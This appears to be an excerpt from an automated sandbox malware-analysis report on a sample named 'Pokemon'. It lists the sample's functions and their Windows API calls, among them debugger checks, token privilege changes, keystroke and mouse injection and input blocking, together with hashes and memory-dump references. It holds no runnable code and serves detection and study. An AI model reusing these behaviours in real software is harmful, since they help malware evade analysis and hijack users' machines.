                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,0000000A), ref: 000C2A8A
                                                                                                                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0000000A), ref: 000C2A94
                                                                                                                                                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0000000A), ref: 000C2AA1
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3906539128-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 91a0b0bdd319ae13027682ab9f7c74cb8740d0ebfa4dd3df19c9676876ad3eb3
                                                                                                                                                                                                                                                                                      • Instruction ID: f2292832c69d39255a4d68782efeaf04f8b58a59b5d7663518868f4f4a5829b7
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 91a0b0bdd319ae13027682ab9f7c74cb8740d0ebfa4dd3df19c9676876ad3eb3
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CD319575901228ABCB61DF68D989BDDBBB8BF08310F5041DAE81CA6261E7709F858F45
                                                                                                                                                                                                                                                                                      Function 000F2010 Relevance: 4.6, APIs: 3, Instructions: 68COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 000B014B: __CxxThrowException@8.LIBVCRUNTIME ref: 000B09D8
                                                                                                                                                                                                                                                                                        • Part of subcall function 000B014B: __CxxThrowException@8.LIBVCRUNTIME ref: 000B09F5
                                                                                                                                                                                                                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 000F205A
                                                                                                                                                                                                                                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 000F2087
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 000F2097
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 577356006-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 790228ccc3cec791196b19934e8dc57451ce17a9b27afb36c5b93d61ab92c0bc
                                                                                                                                                                                                                                                                                      • Instruction ID: c544c03988519998a47a5d28a87456f282efab8e15286b26e757f290c6db323c
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 790228ccc3cec791196b19934e8dc57451ce17a9b27afb36c5b93d61ab92c0bc
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 32118FB2414205BFD728AF54EC86DABB7B8EB44710B20851EF15657652DB70BC82CA64
                                                                                                                                                                                                                                                                                      Function 000B5058 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(?,?,000B502E,?,001598D8,0000000C,000B5185,?,00000002,00000000), ref: 000B5079
                                                                                                                                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000,?,000B502E,?,001598D8,0000000C,000B5185,?,00000002,00000000), ref: 000B5080
                                                                                                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 000B5092
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1703294689-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 33e42b72e767e14c554e206a5a011e78f46916b1b7ebc49ae32a717a35a1b846
                                                                                                                                                                                                                                                                                      • Instruction ID: 82f4bd844bb1ac5f8d26970bd3121d0f676b46ad68408e32917c7ec97faf8d3d
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 33e42b72e767e14c554e206a5a011e78f46916b1b7ebc49ae32a717a35a1b846
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F4E0B631020548AFCF21BF54ED09E983BA9EB55392F114054F8499A962DB35DDA3CAC0
                                                                                                                                                                                                                                                                                      Function 000EE652 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetUserNameW.ADVAPI32(?,?), ref: 000EE664
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: NameUser
                                                                                                                                                                                                                                                                                      • String ID: X64
                                                                                                                                                                                                                                                                                      • API String ID: 2645101109-893830106
                                                                                                                                                                                                                                                                                      • Opcode ID: 04a5d2118910778102ccff7ffe18d243945c0d480cf3453c4e45152ac36a48ae
                                                                                                                                                                                                                                                                                      • Instruction ID: 91516e59b0b2e94fd7097a34a2221823c0218bc29560f092c23e63c939026770
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 04a5d2118910778102ccff7ffe18d243945c0d480cf3453c4e45152ac36a48ae
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8CD0C9B580115DEADFA4CB90ECC8DDD737CBB04304F100651F106A2000D73095498B14
                                                                                                                                                                                                                                                                                      Function 001041FA Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,001152EE,?,?,00000035,?), ref: 00104229
                                                                                                                                                                                                                                                                                      • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,001152EE,?,?,00000035,?), ref: 00104239
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ErrorFormatLastMessage
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3479602957-0
                                                                                                                                                                                                                                                                                      • Opcode ID: ec749bbdf793150e018a04d12ab98f49850e747f58def033042d71b1423e19c1
                                                                                                                                                                                                                                                                                      • Instruction ID: 7aefcec245d75cb6a65e5e72fca85722c4fb6d2c2714f42b1e839b191ee2ce3f
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ec749bbdf793150e018a04d12ab98f49850e747f58def033042d71b1423e19c1
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FDF0A0707002247AEB205665EC4DFEB366DEF85761F100265B605D2281DA709A40C6B0
                                                                                                                                                                                                                                                                                      Function 000FBBED Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 000FBC24
                                                                                                                                                                                                                                                                                      • keybd_event.USER32(?,75A8C0D0,?,00000000), ref: 000FBC37
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: InputSendkeybd_event
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3536248340-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 1c2a5861d0b8f3bc7585dedde6d0c2d966f0750204b401ef5b825b3c5f3d6031
                                                                                                                                                                                                                                                                                      • Instruction ID: 8ce6593f82ef335cebd1deca447afcd492e5d6f274dfeb2923ad6111c6f7db82
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1c2a5861d0b8f3bc7585dedde6d0c2d966f0750204b401ef5b825b3c5f3d6031
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FFF06D7080024DABDB119FA0D805BBF7BB0FF04309F148009FA51A5191C3798211DF94
                                                                                                                                                                                                                                                                                      Function 000F1A0B Relevance: 3.0, APIs: 2, Instructions: 24COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,000F1B48), ref: 000F1A20
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,000F1B48), ref: 000F1A35
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 81990902-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 70bc9fdb392087e0e62fde5c352e77c3dbe5a68ef43e1dc1d3d97d5f0c0ba5e9
                                                                                                                                                                                                                                                                                      • Instruction ID: c90c3de2b7a85ab89511855dfdf1b5ced5a371f0e8fac649277a1daa7d10edb3
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 70bc9fdb392087e0e62fde5c352e77c3dbe5a68ef43e1dc1d3d97d5f0c0ba5e9
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F2E09A72014610BEE7652B14FC05EB777A9EB04311F24891DB5A580871DA626CA1DA54
                                                                                                                                                                                                                                                                                      Function 0010F4FF Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • BlockInput.USER32(00000001), ref: 0010F51A
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: BlockInput
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3456056419-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 219c8b984b255bfb12593b1cf65485c483613d1eb8c4680ca50d2400e28388f2
                                                                                                                                                                                                                                                                                      • Instruction ID: 9ff15a478621ae286a69d542bfca4583c89fb7d84692b6c5bffce70b53294a6d
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 219c8b984b255bfb12593b1cf65485c483613d1eb8c4680ca50d2400e28388f2
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BDE048312002049FD720DF69D805D96F7D8BFA4761F008429F849D7752D7B0FD418B90
                                                                                                                                                                                                                                                                                      Function 000FEC6C Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 000FEC95
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: mouse_event
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2434400541-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 15f58f349ce55043ed384a3e53836862eeba924b2575e0502eeefdcefe28c4c6
                                                                                                                                                                                                                                                                                      • Instruction ID: 1d028a01b92c52ea42ccacae391e7d8cfa236e25dfaf5f85f52fea8b8f9c738b
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 15f58f349ce55043ed384a3e53836862eeba924b2575e0502eeefdcefe28c4c6
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 44D017B619028879E8680A3CDB2FE7A1A49A302741F944349F302D5DB5E5C19A46B1A1
                                                                                                                                                                                                                                                                                      Function 000B0D45 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(Function_00020D51,000B075E), ref: 000B0D4A
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3192549508-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 7dba7500c264b428907bb7fc66822ab7fb16f1531a06b1f4017efd5ed97026ef
                                                                                                                                                                                                                                                                                      • Instruction ID: 5ff7cc3990dc9596e9a6ca9db5c85b34cdf8e6bb0009da7c5c7516bd96c85b98
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7dba7500c264b428907bb7fc66822ab7fb16f1531a06b1f4017efd5ed97026ef
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                                                      Function 0011353B Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 0011358D
                                                                                                                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 001135A0
                                                                                                                                                                                                                                                                                      • DestroyWindow.USER32 ref: 001135AF
                                                                                                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 001135CA
                                                                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000), ref: 001135D1
                                                                                                                                                                                                                                                                                      • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00113700
                                                                                                                                                                                                                                                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 0011370E
                                                                                                                                                                                                                                                                                      • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00113755
                                                                                                                                                                                                                                                                                      • GetClientRect.USER32(00000000,?), ref: 00113761
                                                                                                                                                                                                                                                                                      • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0011379D
                                                                                                                                                                                                                                                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001137BF
                                                                                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001137D2
                                                                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001137DD
                                                                                                                                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 001137E6
                                                                                                                                                                                                                                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001137F5
                                                                                                                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 001137FE
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00113805
                                                                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00113810
                                                                                                                                                                                                                                                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00113822
                                                                                                                                                                                                                                                                                      • OleLoadPicture.OLEAUT32(?,00000000,00000000,00130C04,00000000), ref: 00113838
                                                                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00113848
                                                                                                                                                                                                                                                                                      • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 0011386E
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 0011388D
                                                                                                                                                                                                                                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001138AF
                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00113A9C
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                                                                                                                                                                                      • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                                                                                                                                                                                      • API String ID: 2211948467-2373415609
                                                                                                                                                                                                                                                                                      • Opcode ID: 386931fff16465e0144074a1b56bcb5e67761c0da7049af6530fec031a627100
                                                                                                                                                                                                                                                                                      • Instruction ID: eabeefd3f2c7f03ee21f5c3e063c15a39d6504b10f79d7a8ed22cf138e1745d3
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 386931fff16465e0144074a1b56bcb5e67761c0da7049af6530fec031a627100
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A9027C71900215BFDB14DF64DC89EAE7BB9FF49310F108158F915AB6A1CB74AE81CB60
                                                                                                                                                                                                                                                                                      Function 00127B0D Relevance: 49.8, APIs: 33, Instructions: 273COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • SetTextColor.GDI32(?,00000000), ref: 00127B67
                                                                                                                                                                                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00127B98
                                                                                                                                                                                                                                                                                      • GetSysColor.USER32(0000000F), ref: 00127BA4
                                                                                                                                                                                                                                                                                      • SetBkColor.GDI32(?,000000FF), ref: 00127BBE
                                                                                                                                                                                                                                                                                      • SelectObject.GDI32(?,?), ref: 00127BCD
